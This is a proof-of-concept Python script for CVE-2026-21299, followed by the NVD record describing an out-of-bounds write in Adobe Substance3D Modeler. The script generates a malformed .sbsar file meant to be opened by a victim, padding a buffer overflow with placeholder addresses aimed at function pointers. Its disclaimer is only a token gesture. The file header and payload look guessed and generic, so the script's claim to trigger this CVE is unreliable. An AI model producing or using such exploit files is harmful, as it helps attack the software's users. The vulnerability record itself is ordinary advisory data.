CVE-2026-21299

# CVE-2026-21299 PoC - Malicious Substance3D Modeler File # This PoC creates a malformed .sbsar file that triggers out-of-bounds write # Usage: Open the generated file in Adobe Substance3D Modeler <= 1.22.4 import struct import os def create_malicious_sbsar(): """ Generate a malicious SBSAR file to trigger CVE-2026-21299 The file contains crafted data that causes buffer overflow during parsing """ # SBSAR file header header = b'SBSAR' # File signature header += struct.pack('<I', 1) # Version header += struct.pack('<I', 0x100) # Offset to data # Malicious payload that triggers OOB write # Long string to overflow buffer boundaries overflow_data = b'A' * 0x10000 # 64KB of padding # Crafted object properties that trigger unsafe write # Overwrite function pointers or vtable entries shellcode_addr = struct.pack('<Q', 0x4141414141414141) # Fake address trigger_data = overflow_data + shellcode_addr * 100 # File metadata with malicious values metadata = b'\x00' * 16 # Reserved metadata += struct.pack('<I', 0xFFFFFFFF) # Malformed size field metadata += trigger_data # Combine all parts malicious_file = header + metadata return malicious_file def main(): output_path = 'CVE-2026-21299_poc.sbsar' poc_data = create_malicious_sbsar() with open(output_path, 'wb') as f: f.write(poc_data) print(f'[+] PoC file generated: {output_path}') print(f'[+] File size: {len(poc_data)} bytes') print('[!] Warning: This PoC is for educational/research purposes only') print('[!] Do not use for malicious activities') if __name__ == '__main__': main()

{"cve": {"id": "CVE-2026-21299", "sourceIdentifier": "[email protected]", "published": "2026-01-13T21:15:53.470", "lastModified": "2026-01-14T17:57:58.853", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Substance3D - Modeler versions 1.22.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}, {"lang": "es", "value": "Substance3D - Modeler versiones 1.22.4 y anteriores están afectadas por una vulnerabilidad de escritura fuera de límites que podría resultar en ejecución de código arbitrario en el contexto del usuario actual. La explotación de este problema requiere interacción del usuario en el sentido de que una víctima debe abrir un archivo malicioso."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:substance_3d_modeler:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.22.5", "matchCriteriaId": "D5A6870D-D2DE-4B8F-8680-3717CA179D14"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}